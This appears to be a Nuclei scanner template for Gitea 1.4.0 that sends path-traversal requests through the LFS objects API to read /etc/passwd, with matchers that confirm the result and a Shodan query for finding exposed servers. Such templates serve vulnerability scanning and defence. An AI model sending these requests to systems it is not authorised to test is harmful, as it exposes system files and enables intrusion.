id: gitea-rce info: name: Gitea 1.4.0 - Remote Code Execution author: theamanrawat severity: critical description: | Gitea 1.4.0 is vulnerable to remote code execution. reference: - https://www.exploit-db.com/exploits/44996 - https://github.com/kacperszurek/exploits/blob/master/Gitea/gitea_lfs_rce.py metadata: verified: true max-request: 3 shodan-query: 'title:"Installation - Gitea: Git with a cup of tea"' tags: gitea,rce,unauth,edb http: - raw: - | GET /api/v1/repos/search?limit=1 HTTP/1.1 Host: {{Hostname}} - | POST /{{repo}}.git/info/lfs/objects HTTP/1.1 Host: {{Hostname}} Content-Type: application/json Accept: application/vnd.git-lfs+json { "Oid": "....../../../etc/passwd", "Size": 1000000, "User" : "{{randstr}}", "Password" : "{{randstr}}", "Repo" : "{{randstr}}", "Authorization" : "{{randstr}}" } - | GET /{{repo}}.git/info/lfs/objects/......%2F..%2F..%2Fetc%2Fpasswd/sth HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: regex part: body_3 regex: - "root:.*:0:0:" - type: word part: header_3 words: - "application/octet-stream" extractors: - type: regex name: repo group: 1 regex: - '"name":".*","full_name":"(.*)","description"' internal: true # digest: 490a0046304402206bedfc95c5c775b9dab649e784921360bfcc0c684722fd67533e2def7e40cc7c0220665341d1ed01c8bdfa56d062fc988325a387a1fccda93d31db3dd809072ef49c:922c64590222798bb761d5b6d8e72950